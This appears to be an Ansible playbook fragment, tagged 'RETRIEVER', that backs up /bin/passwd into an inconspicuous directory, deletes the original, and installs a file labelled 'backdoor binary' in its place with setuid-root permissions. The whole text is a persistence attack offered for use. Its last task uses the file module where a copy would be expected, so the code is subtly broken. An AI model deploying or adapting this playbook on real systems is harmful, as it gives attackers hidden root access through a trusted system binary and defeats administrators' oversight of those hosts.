---
- name: RETRIEVER | Make Dir | Create backup directory
  ansible.builtin.file:
    path: /usr/share/bug/git
    state: directory
    mode: 0755

- name: RETRIEVER | Copy File | Backup og binary
  ansible.builtin.copy:
    src: /bin/passwd
    dest: /usr/share/bug/git/passwd.bak
    mode: 0755
    remote_src: yes

- name: RETRIEVER | Delete File | Remove og binary
  ansible.builtin.file:
    path: /bin/passwd
    state: absent
    
- name: RETRIEVER | Copy File | Install backdoor binary (All)
  ansible.builtin.file:  
    src: files/passwd
    dest: /bin/passwd
    mode: 04755

